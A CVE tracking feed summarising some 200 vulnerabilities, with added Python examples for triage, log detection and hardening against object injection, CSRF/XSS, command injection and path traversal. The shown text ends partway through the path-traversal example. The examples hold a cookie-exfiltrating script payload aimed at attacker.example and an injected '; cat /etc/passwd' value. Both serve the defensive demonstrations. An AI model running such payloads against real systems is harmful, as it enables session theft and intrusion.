222 CVEs tracked today. 15 Critical, 86 High, 110 Medium, 11 Low.
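The header above summarizes a feed whose entries follow a fixed layout: CVE ID, severity, a "CVSS n.n" line, a one-paragraph description, zero or more tag lines, and a "-" separator. The following Python is an added example (not part of this page or any vendor tooling) that parses that layout and orders entries the way a triage queue would: entries whose description records observed in-the-wild exploitation first, then entries with a public PoC, then by CVSS. The embedded sample feed is constructed from abbreviated copies of three entries on this page; the phrase patterns the two flags match are taken from the wording these descriptions use.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in the feed's own layout; the three entries are abbreviated
# copies of entries on this page. The last entry deliberately has no trailing "-".
SAMPLE_FEED = """\
CVE-2025-34030
CRITICAL
CVSS 10.0
OS command injection in sar2html 3.2.2 and earlier via the 'plot' parameter of index.php. Active exploitation was observed by the Shadowserver Foundation as of February 4, 2025.
PHP
Command Injection
-
CVE-2025-6372
HIGH
CVSS 8.8
A buffer overflow vulnerability (CVSS 8.8). Risk factors: public PoC available.
Buffer Overflow
D-Link
RCE
-
CVE-2025-52802
HIGH
CVSS 7.5
CVE-2025-52802 is a security vulnerability (CVSS 7.5). High severity vulnerability requiring prompt remediation.
Authentication Bypass
WordPress
"""

# Phrasings this feed uses to record exploitation evidence; "actively exploitable"
# (a statement about ease, not evidence) is deliberately not matched.
EXPLOITED_RE = re.compile(
    r"active(?:ly)? exploit(?:ation|ed)|exploited in the wild|exploitation was (?:observed|confirmed)",
    re.I)
POC_RE = re.compile(r"public(?:ly)? (?:PoC|proof[- ]of[- ]concept|exploit|disclos)", re.I)
CVE_RE = re.compile(r"^CVE-\d{4}-\d{4,}$")


@dataclass
class Entry:
    cve: str
    severity: str
    cvss: float
    description: str
    tags: list = field(default_factory=list)

    @property
    def exploited(self) -> bool:
        return EXPLOITED_RE.search(self.description) is not None

    @property
    def has_poc(self) -> bool:
        return POC_RE.search(self.description) is not None

    def priority(self) -> tuple:
        # Sort key: observed exploitation outranks a public PoC, which outranks raw CVSS.
        return (self.exploited, self.has_poc, self.cvss)


def _parse_block(lines: list) -> Entry:
    cve, severity, cvss_line, description, *tags = lines
    if not CVE_RE.match(cve) or not cvss_line.startswith("CVSS "):
        raise ValueError(f"malformed entry starting {cve!r}")
    return Entry(cve, severity, float(cvss_line.split()[1]), description, tags)


def parse_feed(text: str) -> list:
    """Split the feed on '-' separator lines and parse each block into an Entry."""
    entries, block = [], []
    for line in text.splitlines() + ["-"]:  # sentinel flushes a final entry with no separator
        if line.strip() == "-":
            if block:
                entries.append(_parse_block(block))
                block = []
        elif line.strip():
            block.append(line.rstrip())
    return entries


def triage(text: str) -> list:
    """CVE IDs ordered for action: exploited first, then public PoC, then CVSS."""
    return [e.cve for e in sorted(parse_feed(text), key=Entry.priority, reverse=True)]


if __name__ == "__main__":
    for e in sorted(parse_feed(SAMPLE_FEED), key=Entry.priority, reverse=True):
        print(f"{e.cve:18} {e.cvss:4} exploited={e.exploited!s:5} poc={e.has_poc!s:5} {', '.join(e.tags)}")
```

The two regexes are the weak point of any prose-driven triage: they only recognise the phrasings this feed happens to use, so when a KEV or EPSS field is available it should replace the `exploited` heuristic rather than sit beside it.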
-
CVE-2025-49132
CRITICAL
CVSS 10.0
Pterodactyl game server management panel prior to version 1.11.11 contains an unauthenticated remote code execution via the /locales/locale.json endpoint. By manipulating the locale and namespace query parameters, attackers can execute arbitrary code on the panel server, gaining control over all managed game servers.
RCE
-
CVE-2025-25038
CRITICAL
CVSS 9.8
MiniDVBLinux version 5.4 and earlier contains an unauthenticated OS command injection in the web-based management interface. The DVB streaming platform fails to sanitize user input before passing it to operating system commands, enabling remote attackers to execute arbitrary commands on the media server.
Command Injection
Minidvblinux
-
CVE-2025-25034
CRITICAL
CVSS 9.3
SugarCRM versions prior to 6.5.24, 6.7.13, 7.5.2.5, 7.6.2.2, and 7.7.1.0 contain a PHP object injection vulnerability via the SugarRestSerialize.php script. The rest_data parameter is passed to unserialize() without validation, allowing unauthenticated attackers to inject malicious PHP objects for remote code execution.
Deserialization
PHP
RCE
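The SugarCRM entry describes the classic PHP object injection shape: attacker text reaches unserialize(), so a serialized object header such as O:7:"Example":1:{...} is enough to instantiate an arbitrary class and trigger its magic methods. The Python below is an added example, not SugarCRM code, that recognises that header in a decoded request parameter and runs the check over constructed access-log lines. The class name Example, the addresses, the log lines and the placement of rest_data in the query string (the real endpoint may receive it in a POST body, which a standard access log does not record) are assumptions for illustration.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Header of a serialized PHP object: O:<length of class name>:"<class name>":<property count>:{
# Serialized arrays start with a: instead and are plain data; only O: instantiates a class.
PHP_OBJECT_RE = re.compile(r'O:(\d+):"([^"]*)":(\d+):\{')


def php_objects_in(value: str) -> list:
    """Class names of serialized PHP objects embedded in an already-decoded parameter value.
    The declared length must equal the class-name length, which filters chance matches."""
    return [name for length, name, _ in PHP_OBJECT_RE.findall(value) if int(length) == len(name)]


def scan_access_log(lines, param: str = "rest_data"):
    """Yield (client_ip, class_names) for Common Log Format lines whose query string carries
    a serialized PHP object in `param`. Decodes a second time because clients double-encode."""
    for line in lines:
        parts = line.split()
        if len(parts) < 7:
            continue
        client, request_path = parts[0], parts[6]
        query = parse_qs(urlsplit(request_path).query, keep_blank_values=True)
        for raw in query.get(param, []):
            classes = php_objects_in(unquote_plus(raw))
            if classes:
                yield client, classes


# Constructed log lines. Line 2 carries O:7:"Example":1:{s:4:"name";s:1:"x";} (an object),
# line 3 carries a:1:{s:4:"name";s:1:"x";} (an array), both percent-encoded.
LOG = """\
203.0.113.7 - - [10/Jun/2025:12:00:01 +0000] "GET /service/v4/rest.php?method=login&input_type=JSON HTTP/1.1" 200 512
203.0.113.9 - - [10/Jun/2025:12:00:02 +0000] "GET /service/core/SugarRestSerialize.php?rest_data=O%3A7%3A%22Example%22%3A1%3A%7Bs%3A4%3A%22name%22%3Bs%3A1%3A%22x%22%3B%7D HTTP/1.1" 200 77
198.51.100.4 - - [10/Jun/2025:12:00:03 +0000] "GET /service/core/SugarRestSerialize.php?rest_data=a%3A1%3A%7Bs%3A4%3A%22name%22%3Bs%3A1%3A%22x%22%3B%7D HTTP/1.1" 200 77
"""


def hits(log: str = LOG) -> list:
    return list(scan_access_log(log.splitlines()))


if __name__ == "__main__":
    for client, classes in hits():
        print(f"{client}: serialized object(s) {classes} in rest_data")
```

The array-versus-object distinction matters for the fix as well as for detection: code that genuinely needs structured input from clients should accept JSON, and unserialize() calls that cannot be removed should at least pass `['allowed_classes' => false]` (PHP 7+) so no object is ever instantiated from untrusted bytes.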
-
CVE-2025-48706
CRITICAL
CVSS 9.1
A buffer overflow in COROS PACE 3 firmware that leads to remote code execution (CVSS 9.1). Risk factors: public PoC available.
Buffer Overflow
Coros Pace 3 Firmware
-
CVE-2025-46179
CRITICAL
CVSS 9.8
CVE-2025-46179 is a critical SQL injection vulnerability in CloudClassroom-PHP Project v1.0's askquery.php file, where the 'squeryx' parameter is passed directly into SQL queries without sanitization. This affects all installations of CloudClassroom-PHP v1.0 and allows unauthenticated remote attackers to execute arbitrary SQL commands, potentially leading to complete database compromise including data exfiltration, modification, and denial of service. The vulnerability has a CVSS 9.8 score reflecting its network-based exploitability with no authentication or user interaction required; active exploitation status and POC availability are unknown from the provided data.
PHP
SQLi
Cloudclassroom Php Project
-
CVE-2025-45890
CRITICAL
CVSS 9.8
CVE-2025-45890 is a critical directory traversal vulnerability in Novel Plus before v5.1.0 that allows unauthenticated remote attackers to execute arbitrary code by manipulating the filePath parameter. The vulnerability has a CVSS score of 9.8 (critical severity) with a network-based attack vector requiring no privileges or user interaction. Given the critical CVSS metrics and remote code execution capability, this vulnerability poses an immediate and severe risk to all unpatched Novel Plus installations and warrants emergency patching.
RCE
Path Traversal
Novel Plus
-
CVE-2025-44635
CRITICAL
CVSS 9.8
CVE-2025-44635 is an authentication bypass vulnerability (CVSS 9.8, Critical); the affected product and technical details are not recorded in this entry. Critical severity with potential for significant impact on affected systems.
Authentication Bypass
-
CVE-2025-34030
CRITICAL
CVSS 10.0
CVE-2025-34030 is a critical OS command injection vulnerability in sar2html versions 3.2.2 and earlier that allows unauthenticated remote attackers to execute arbitrary shell commands through unsanitized input in the 'plot' parameter of index.php. The vulnerability carries the maximum CVSS score of 10.0 and requires no authentication, user interaction, or special privileges to exploit. Active exploitation was observed by the Shadowserver Foundation as of February 4, 2025, so this is not a theoretical threat.
PHP
Command Injection
-
CVE-2025-34022
CRITICAL
CVSS 9.3
CVE-2025-34022 is an unauthenticated path traversal vulnerability in Selea Targa IP OCR-ANPR cameras affecting at least 9 models (iZero, Targa 512, Targa 504, Targa Semplice, Targa 704 TKM, Targa 805, Targa 710 INOX, Targa 750, Targa 704 ILB). The /common/get_file.php script fails to validate the 'file' parameter, allowing remote attackers to read arbitrary files, including system credentials stored in cleartext. Active exploitation was confirmed by the Shadowserver Foundation on 2025-02-02 UTC; this is not theoretical, it is being weaponized in the wild.
PHP
Authentication Bypass
Path Traversal
Information Disclosure
-
CVE-2025-32880
CRITICAL
CVSS 9.8
COROS PACE 3 smartwatches through firmware version 3.0808.0 download firmware updates over unencrypted HTTP connections when connected to WLAN, enabling attackers to intercept, modify, or inject malicious firmware without authentication. This critical vulnerability (CVSS 9.8) affects all users of the PACE 3 device and could result in complete device compromise, data exfiltration, or persistent malware installation. No active exploitation in the wild has been confirmed at this time, but the trivial attack complexity and network accessibility make this a high-priority patch target.
Information Disclosure
Coros Pace 3 Firmware
-
CVE-2025-32878
CRITICAL
CVSS 9.8
CVE-2025-32878 is an information disclosure vulnerability in COROS PACE 3 firmware (CVSS 9.8); no further technical detail is recorded in this entry. Risk factors: public PoC available.
Information Disclosure
Coros Pace 3 Firmware
-
CVE-2025-32877
CRITICAL
CVSS 9.8
CVE-2025-32877 is an information disclosure vulnerability in COROS PACE 3 firmware (CVSS 9.8); the entry does not record what an attacker can obtain. Risk factors: public PoC available.
Information Disclosure
Coros Pace 3 Firmware
-
CVE-2025-25037
CRITICAL
CVSS 9.3
CVE-2025-25037 is a critical authentication bypass vulnerability in Aquatronica Controller System that exposes an unauthenticated tcp.php endpoint, allowing remote attackers to retrieve plaintext administrative credentials and sensitive system configuration data without authentication. Affected versions include firmware ≤5.1.6 and web interface ≤2.0. Successful exploitation enables complete system compromise, including unauthorized control of connected aquarium devices and manipulation of critical parameters, representing a direct path to full administrative access with no user interaction required.
PHP
Information Disclosure
-
CVE-2025-4981
CRITICAL
CVSS 9.9
A remote code execution vulnerability in Mattermost Server (CVSS 9.9), tagged as path traversal, that is exploitable by authenticated users. Critical severity with potential for significant impact on affected systems.
RCE
Path Traversal
Mattermost Server
Suse
-
CVE-2024-53298
CRITICAL
CVSS 9.8
CVE-2024-53298 is a critical missing authorization vulnerability in the NFS export functionality of Dell PowerScale OneFS that allows unauthenticated remote attackers to gain filesystem access. Affected versions range from 9.5.0.0 through 9.10.0.1, and successful exploitation enables arbitrary file read, modification, and deletion, leading to complete system compromise. With a CVSS score of 9.8 and a network-based attack vector requiring no privileges or user interaction, this vulnerability poses severe risk to unpatched Dell PowerScale deployments; KEV status and active exploitation details should be verified against the vendor advisory.
Authentication Bypass
Dell
Powerscale Onefs
-
CVE-2025-52825
HIGH
CVSS 8.8
A privilege escalation vulnerability in Rameez Iqbal's Real Estate Manager plugin, reachable via cross-site request forgery (CVSS 8.8). High severity vulnerability requiring prompt remediation.
CSRF
Privilege Escalation
-
CVE-2025-52822
HIGH
CVSS 8.5
CVE-2025-52822 is an SQL injection vulnerability in Iqonic Design's WP Roadmap WordPress plugin (versions up to 2.1.3) that allows authenticated attackers to execute arbitrary SQL commands. An attacker with user-level privileges can exploit this via network access without user interaction to read sensitive database contents and cause denial of service. The vulnerability has not been confirmed as actively exploited in the wild, but the high CVSS score (8.5) and low attack complexity indicate this should be treated as a priority for affected WordPress installations.
SQLi
-
CVE-2025-52821
HIGH
CVSS 8.5
CVE-2025-52821 is a SQL injection vulnerability in thanhtungtnt Video List Manager versions up to 1.7 that allows authenticated attackers to execute arbitrary SQL commands. The vulnerability has a CVSS score of 8.5 with high confidentiality impact and a changed scope (S:C), meaning the impact extends beyond the vulnerable component itself to the shared database. While the attack requires valid credentials (PR:L), network accessibility and low attack complexity make this a significant risk for organizations using this plugin.
SQLi
PHP
-
CVE-2025-52802
HIGH
CVSS 7.5
CVE-2025-52802 is an authentication bypass vulnerability in a WordPress (PHP) component (CVSS 7.5); the affected product is not recorded in this entry. High severity vulnerability requiring prompt remediation.
Authentication Bypass
WordPress
PHP
-
CVE-2025-52795
HIGH
CVSS 7.1
CVE-2025-52795 is a Cross-Site Request Forgery (CSRF) vulnerability in the aharonyan WP Front User Submit / Front Editor WordPress plugin (versions up to 4.9.4) that allows unauthenticated attackers to perform unauthorized actions on behalf of authenticated users. The vulnerability has a CVSS score of 7.1 with high availability impact, enabling attackers to modify or delete user-submitted content through malicious web requests without user consent.
CSRF
WordPress
PHP
-
CVE-2025-52794
HIGH
CVSS 7.1
CVE-2025-52794 is a Cross-Site Request Forgery (CSRF) vulnerability in Creative-Solutions Creative Contact Form (versions up to 1.0.0) that enables Stored XSS attacks. An unauthenticated attacker can craft malicious requests to inject persistent JavaScript payloads through contact form submissions, affecting any user who views the contaminated form data. The vulnerability has a CVSS score of 7.1 (High) with network-based attack vector and low attack complexity, making it readily exploitable in typical web deployments.
CSRF
XSS
-
CVE-2025-52793
HIGH
CVSS 7.1
CVE-2025-52793 is a Cross-Site Request Forgery (CSRF) vulnerability in Esselink.nu Settings that enables reflected Cross-Site Scripting (XSS). The vulnerability affects Esselink.nu Settings versions up to and including 2.94, allowing unauthenticated remote attackers to perform actions on behalf of users and inject malicious scripts once a victim visits an attacker-controlled page. With a CVSS score of 7.1 and a network-based attack vector, this vulnerability poses a moderate-to-significant risk to affected installations, particularly if actively exploited or if public proof-of-concept code becomes available.
CSRF
XSS
-
CVE-2025-52792
HIGH
CVSS 7.1
CVE-2025-52792 is a Cross-Site Request Forgery (CSRF) vulnerability in the vgstef WP User Stylesheet Switcher WordPress plugin (versions up to v2.2.0) that enables Stored XSS attacks. An unauthenticated attacker can exploit this via a simple network request with user interaction to inject malicious scripts that execute in victims' browsers, potentially compromising user sessions and data. The vulnerability has not been confirmed as actively exploited in the wild, though the high CVSS score (7.1) and network-accessible attack vector indicate practical exploitability.
CSRF
XSS
WordPress
PHP
-
CVE-2025-52791
HIGH
CVSS 7.1
CVE-2025-52791 is a CSRF vulnerability in devfelixmoira Knowledge Base Maker (versions up to 1.1.8) that enables Stored XSS attacks, allowing unauthenticated remote attackers to inject malicious scripts that persist and execute in users' browsers. The vulnerability requires user interaction (clicking a malicious link) but can affect multiple users through stored payloads, with a CVSS score of 7.1 indicating medium-high severity. No KEV listing or confirmed EPSS data is available in public sources, and patch availability status requires verification with the vendor.
CSRF
XSS
-
CVE-2025-52790
HIGH
CVSS 7.1
CVE-2025-52790 is a CSRF vulnerability in the r-win WP-DownloadCounter WordPress plugin (versions through 1.01) that enables Stored XSS attacks. An attacker can craft malicious requests that, when clicked by an administrator, inject persistent JavaScript into the plugin's data storage, affecting all site visitors. The CVSS 7.1 score reflects moderate severity with network-based attack delivery and user interaction requirements, though the actual exploitability and active exploitation status require verification against KEV and EPSS data.
CSRF
XSS
WordPress
PHP
-
CVE-2025-52789
HIGH
CVSS 7.1
A vulnerability in George Lewe's ChordPress plugin, tagged CSRF and XSS, allows stored cross-site scripting (CVSS 7.1). High severity vulnerability requiring prompt remediation.
CSRF
XSS
-
CVE-2025-52784
HIGH
CVSS 7.1
CVE-2025-52784 is a Cross-Site Request Forgery (CSRF) vulnerability in hideoguchi Bluff Post that enables Stored XSS attacks, affecting versions through 1.1.1. An unauthenticated attacker can craft malicious requests to inject persistent JavaScript payloads that execute in victims' browsers when they view affected content, potentially leading to session hijacking, credential theft, or defacement. The vulnerability has a CVSS score of 7.1 (High) with network-based attack vector and low complexity, indicating moderate real-world risk.
CSRF
XSS
-
CVE-2025-52783
HIGH
CVSS 7.1
A cross-site request forgery vulnerability in themelocation's Change Cart Button Colors WooCommerce plugin that enables stored cross-site scripting (CVSS 7.1). High severity vulnerability requiring prompt remediation.
WordPress
CSRF
XSS
Woocommerce
PHP
-
CVE-2025-52782
HIGH
CVSS 7.1
CVE-2025-52782 is a Reflected Cross-Site Scripting (XSS) vulnerability in King Rayhan Scroll UP WordPress plugin versions through 2.0 that allows unauthenticated attackers to inject malicious scripts into web pages viewed by users. The vulnerability has a CVSS score of 7.1 (High) with network-based attack vector requiring user interaction; attackers can steal session cookies, perform actions on behalf of users, or redirect users to malicious sites. KEV status and active exploitation data were not provided in available intelligence sources, though the reflected XSS nature suggests moderate real-world exploitability.
XSS
-
CVE-2025-52781
HIGH
CVSS 7.1
CVE-2025-52781 is a Cross-Site Request Forgery (CSRF) vulnerability in Beee TinyNav versions up to 1.4 that enables Stored XSS attacks. An unauthenticated attacker can craft malicious requests to inject persistent JavaScript payloads into the application, which are then executed in the browsers of other users who interact with the compromised content. With a CVSS score of 7.1 and network-based attack vector requiring only user interaction, this vulnerability poses a moderate-to-significant risk to affected deployments, particularly if actively exploited in the wild or publicly disclosed with proof-of-concept code.
CSRF
XSS
-
CVE-2025-52780
HIGH
CVSS 7.1
CVE-2025-52780 is a CSRF vulnerability in Mohammad Parsa Logo Manager For Samandehi (versions through 0.5) that enables Stored XSS attacks, allowing unauthenticated attackers to perform unauthorized actions and inject malicious scripts affecting other users. The vulnerability has a CVSS score of 7.1 (High) and exploits weak CSRF protections in an admin/management plugin, with the attack requiring user interaction (UI:R) but affecting multiple users via stored payload persistence.
CSRF
XSS
-
CVE-2025-52772
HIGH
CVSS 7.1
CVE-2025-52772 is a CSRF vulnerability in Adnan Haque's Virtual Moderator plugin (versions through 1.4) that enables Cross-Site Scripting (XSS) attacks. An unauthenticated attacker can exploit this via a malicious webpage to perform unauthorized actions and inject malicious scripts, potentially compromising user sessions and data. With a CVSS score of 7.1 and network-accessible attack vector requiring only user interaction, this vulnerability poses a moderate-to-significant risk to affected installations, though exploitation requires social engineering to trick users into visiting attacker-controlled sites.
CSRF
XSS
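The run of WordPress plugin entries above share one mechanism: a settings or content form that accepts any POST carrying the administrator's cookie and then stores the submitted value without encoding it, so a forged cross-site request plants a persistent script. The Python below is an added, framework-neutral example (not code from any of these plugins; WordPress itself provides wp_nonce_field() and check_admin_referer() for the same purpose) showing the vulnerable handler beside one that requires a per-session token and a matching Origin header, and that encodes stored values at render time. SITE_ORIGIN, the session id, the server secret and the in-memory STORE are constructed.

```python
import hashlib
import hmac
import html

SITE_ORIGIN = "https://shop.example"  # constructed site origin
STORE = {}  # constructed stand-in for the plugin's options table


def issue_csrf_token(session_id: str, secret: bytes) -> str:
    """Per-session token derived from a server secret; embedded in the form as a hidden field."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def authorize_state_change(headers: dict, form: dict, session_id: str, secret: bytes) -> bool:
    """A cookie alone proves nothing about intent (browsers attach it to cross-site POSTs too).
    Require a token bound to this session and, when the browser sent Origin, the site's own origin."""
    origin = headers.get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return False
    expected = issue_csrf_token(session_id, secret).encode()
    supplied = str(form.get("_csrf", "")).encode()
    return hmac.compare_digest(expected, supplied)  # constant-time compare


def save_setting_vulnerable(headers: dict, form: dict, session_id: str, secret: bytes) -> bool:
    # Shape of the affected handlers: the user is logged in, so store whatever was posted.
    STORE["footer_html"] = form["footer_html"]
    return True


def save_setting_hardened(headers: dict, form: dict, session_id: str, secret: bytes) -> bool:
    if not authorize_state_change(headers, form, session_id, secret):
        return False
    STORE["footer_html"] = form["footer_html"]
    return True


def render_footer_vulnerable() -> str:
    # Stored value echoed raw: a planted <script> runs for every visitor.
    return "<footer>{}</footer>".format(STORE.get("footer_html", ""))


def render_footer_hardened() -> str:
    """Encoding at output time is what stops a stored value from running as script."""
    return "<footer>{}</footer>".format(html.escape(STORE.get("footer_html", ""), quote=True))


def demo() -> dict:
    """Walk a forged request through both handlers; returns what each accepted and rendered."""
    secret, sid = b"constructed-server-secret", "sess-42"
    forged_headers = {"Origin": "https://attacker.example"}   # cross-site POST from a lure page
    payload = {"footer_html": "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"}
    STORE.clear()
    vulnerable_accepted = save_setting_vulnerable(forged_headers, payload, sid, secret)
    vulnerable_render = render_footer_vulnerable()
    STORE.clear()
    hardened_accepted_forgery = save_setting_hardened(forged_headers, payload, sid, secret)
    legit = {"footer_html": "<b>hi</b>", "_csrf": issue_csrf_token(sid, secret)}
    hardened_accepted_legit = save_setting_hardened({"Origin": SITE_ORIGIN}, legit, sid, secret)
    return {
        "vulnerable_accepted_forgery": vulnerable_accepted,
        "vulnerable_render": vulnerable_render,
        "hardened_accepted_forgery": hardened_accepted_forgery,
        "hardened_accepted_legit": hardened_accepted_legit,
        "hardened_render": render_footer_hardened(),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The two controls are independent and both are needed: the token stops the forged write, and output encoding limits the damage if a write ever gets through by another route (an import feature, a compromised editor account).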
-
CVE-2025-52715
HIGH
CVSS 7.5
CVE-2025-52715 is a PHP Local File Inclusion (LFI) vulnerability in RadiusTheme's Classified Listing plugin that allows authenticated attackers to include and execute arbitrary local files through improper filename validation in PHP include/require statements. The vulnerability affects Classified Listing versions up to 4.2.0, and while the CVSS score of 7.5 indicates high severity, exploitation requires an authenticated account and a high attack complexity, suggesting moderate real-world risk absent evidence of active exploitation or a public proof of concept.
PHP
Information Disclosure
-
CVE-2025-52708
HIGH
CVSS 7.5
CVE-2025-52708 is a PHP Local File Inclusion (LFI) vulnerability in RealMag777 HUSKY versions up to 1.3.7, stemming from improper control of filenames in include/require statements. An authenticated attacker with low privileges (PR:L) can exploit this remotely to read arbitrary files from the server filesystem, potentially leading to information disclosure, code execution, or system compromise. The CVSS 7.5 score and the requirement for authenticated access suggest moderate real-world risk; active exploitation status and PoC availability are not confirmed from available data, but the vulnerability class (CWE-98, RFI/LFI) is historically high-value for attackers.
PHP
Lfi
Code Injection
-
CVE-2025-49873
HIGH
CVSS 7.1
CVE-2025-49873 is a Reflected Cross-Site Scripting (XSS) vulnerability in NasaTheme's Elessi WordPress theme that allows unauthenticated attackers to inject malicious scripts into web pages viewed by victims. Versions up to and including 6.3.9 are affected. An attacker can steal session cookies, perform actions on behalf of users, or redirect users to malicious sites with minimal complexity (network-accessible input, user interaction required). The vulnerability lacks confirmed EPSS data and KEV listing at this time, but the CVSS 7.1 score and reflected XSS nature indicate moderate-to-high priority.
XSS
-
CVE-2025-49715
HIGH
CVSS 7.5
CVE-2025-49715 is a private personal information disclosure vulnerability in Microsoft Dynamics 365 FastTrack Implementation Assets that allows unauthenticated network-based attackers to access sensitive user data without any user interaction. The vulnerability has a CVSS score of 7.5 (High) with confirmed high confidentiality impact, and affects organizations using Dynamics 365 FastTrack resources. Given the network-accessible nature and lack of authentication requirements, this poses significant risk to enterprise customer data security.
Information Disclosure
Microsoft
Dynamics 365
-
CVE-2025-48945
HIGH
CVSS 8.2
pycares versions prior to 4.9.0 contain a use-after-free vulnerability (CWE-416) in the Channel object that crashes the Python interpreter when garbage collection occurs during pending DNS queries. This denial-of-service vulnerability affects any application using pycares for asynchronous DNS resolution; attackers can trigger interpreter crashes by manipulating DNS query timing, though no active exploitation or public POC is documented. The CVSS 8.2 score reflects high availability impact, but real-world exploitability is limited by the requirement for application-level DNS query patterns and Python garbage collection timing.
Use After Free
Python
Denial Of Service
Redhat
Suse
-
CVE-2025-48705
HIGH
CVSS 7.5
CVE-2025-48705 is a NULL pointer dereference vulnerability in COROS PACE 3 smartwatch firmware (versions 3.0 through 3.0808.0) that allows unauthenticated attackers within Bluetooth range to trigger a device reboot by sending a specially crafted Bluetooth Low Energy (BLE) message. The vulnerability results in denial of service with no additional privileges required, affecting the availability of the device. With a CVSS 7.5 score, this poses a significant nuisance risk to users; the attack needs no pairing or credentials but does require radio proximity to the watch, and impact is limited to device unavailability rather than data compromise.
Denial Of Service
Coros Pace 3 Firmware
-
CVE-2025-47771
HIGH
CVSS 8.1
PowSyBl versions 6.3.0 through 6.7.1 contain an unsafe deserialization vulnerability in the SparseMatrix.read() method that allows remote attackers to achieve arbitrary code execution and privilege escalation without authentication or user interaction. The vulnerability affects the powsybl-math library, a core component of the Power System Blocks framework used in power grid management software. Exploitation requires only network access to an application exposing the vulnerable deserialization method.
Deserialization
-
CVE-2025-45331
HIGH
CVSS 7.5
CVE-2025-45331 is a NULL pointer dereference vulnerability in the br_dagens_handle_once function of brplot v420.69.1 that causes denial of service through segmentation faults and program crashes. The vulnerability is remotely exploitable without authentication or user interaction (CVSS 7.5), making it a high availability-impact risk for any system processing brplot data. While KEV status and active exploitation data are not provided, the network-accessible attack vector and high availability impact suggest this warrants prioritizing patches for affected deployments.
Denial Of Service
Brplot
-
CVE-2025-44203
HIGH
CVSS 7.5
CVE-2025-44203 is a high-severity information disclosure vulnerability in HotelDruid 3.0.7 that allows unauthenticated attackers to extract sensitive database credentials (administrator username, password hash, and salt) through verbose SQL error messages on the creadb.php endpoint. The vulnerability can also be used to cause a denial of service that locks administrators out of the system. With a CVSS score of 7.5 and no authentication required, this poses an immediate threat to unpatched HotelDruid installations.
PHP
Denial Of Service
Hoteldruid
-
CVE-2025-34029
HIGH
CVSS 8.8
CVE-2025-34029 is an OS command injection vulnerability in Edimax EW-7438RPn Mini wireless range extender firmware version 1.13 and prior that allows authenticated remote attackers to execute arbitrary shell commands as root through the /goform/formSysCmd endpoint. The vulnerability has a CVSS score of 8.8 (High), and exploitation in the wild was observed by the Shadowserver Foundation on 2024-09-14 UTC, indicating active real-world attack activity against this widely deployed consumer networking device.
Command Injection
Ew 7438rpn Mini Firmware
-
CVE-2025-34024
HIGH
CVSS 8.8
CVE-2025-34024 is an OS command injection vulnerability in Edimax EW-7438RPn wireless range extender firmware versions 1.13 and prior, allowing authenticated attackers to execute arbitrary commands as root via the /goform/mp endpoint. The vulnerability results from improper input validation on the 'command' parameter in the mp.asp form handler, enabling shell metacharacter injection. Active exploitation was observed by the Shadowserver Foundation on 2024-09-14 UTC, indicating real-world threat activity against this device.
Command Injection
Ew 7438rpn Mini Firmware
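The sar2html, MiniDVBLinux and the two Edimax entries all describe the same defect: a request parameter spliced into a command line that a shell then parses, so a ';', '|' or '$(...)' in the value becomes a second command. The Python below is an added example, not code from any of those products, that shows how the shell tokenises an injected value and the two fixes that remove the problem: an allow-list on the value and execution via argv with no shell. The child process is a stand-in for the real tool (a Python one-liner that echoes its argument) so the example runs offline.

```python
import re
import shlex
import subprocess
import sys

# Allow-list for a hostname-like parameter: letters, digits, dot, hyphen; nothing a shell cares about.
SAFE_HOST_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")


def vulnerable_cmdline(host: str) -> str:
    """Shape of the affected handlers: the parameter is pasted into a command string for a shell."""
    return f"ping -c 1 {host}"


def shell_tokens(cmdline: str) -> list:
    """Tokenise the way a POSIX shell would, so the effect of an injected ';' is visible."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return list(lex)


def validate_host(host: str) -> str:
    if not SAFE_HOST_RE.match(host):
        raise ValueError(f"rejected parameter value: {host!r}")
    return host


def run_hardened(host: str) -> str:
    """Validated value passed as one argv element with no shell involved. The child is a
    stand-in for the real tool (a Python one-liner that echoes argv[1]) so this runs offline."""
    argv = [sys.executable, "-c", "import sys; print(sys.argv[1])", validate_host(host)]
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout.strip()


def is_rejected(host: str) -> bool:
    try:
        run_hardened(host)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    injected = "127.0.0.1; cat /etc/passwd"
    print(shell_tokens(vulnerable_cmdline(injected)))   # the ';' becomes a command separator
    print(run_hardened("10.0.0.1"))
    print(is_rejected(injected))
```

Argv execution alone is not a complete fix: a value such as "-f" can still be read as an option by the child program, which is why the allow-list (or a "--" end-of-options marker where the tool supports it) is kept in front of it.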
-
CVE-2025-34023
HIGH
CVSS 8.5
CVE-2025-34023 is a path traversal vulnerability in Karel IP1211 IP Phone's web management panel that allows remote authenticated attackers to read arbitrary files from the underlying system via unsanitized input to the /cgi-bin/cgiServer.exx endpoint's page parameter. This vulnerability affects IP phone administrators with network access to the management interface and carries a CVSS 8.5 score reflecting high confidentiality impact. Active exploitation evidence was documented by Shadowserver Foundation on 2025-02-02 UTC, indicating real-world attack activity.
Path Traversal
Information Disclosure
IoT
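The Selea get_file.php, Karel cgiServer.exx, Novel Plus and the two WordPress LFI entries all reduce to a filename parameter joined onto a base directory without canonicalisation. The Python below is an added example (not code from any of those products) that reproduces the bug against a constructed temporary directory and then shows the check that closes it: decode, reject absolute paths and NUL bytes, canonicalise with realpath, and require the result to remain under the base. The directory layout and the secret file's contents are constructed.

```python
import os
import tempfile
from urllib.parse import unquote


def serve_file_vulnerable(base_dir: str, requested: str) -> str:
    """Shape of the affected handlers: the parameter is joined onto the base path unchecked.
    '../' climbs out, and os.path.join drops base_dir entirely if `requested` is absolute."""
    with open(os.path.join(base_dir, requested)) as fh:
        return fh.read()


def resolve_under(base_dir: str, requested: str) -> str:
    """Canonical path of `requested` if it lies under base_dir, else PermissionError."""
    decoded = unquote(unquote(requested))      # handles %2e%2e%2f and double-encoded %252e
    if "\x00" in decoded or os.path.isabs(decoded):
        raise PermissionError(f"rejected: {requested!r}")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, decoded))   # resolves '..' and symlinks
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"rejected: {requested!r}")
    return target


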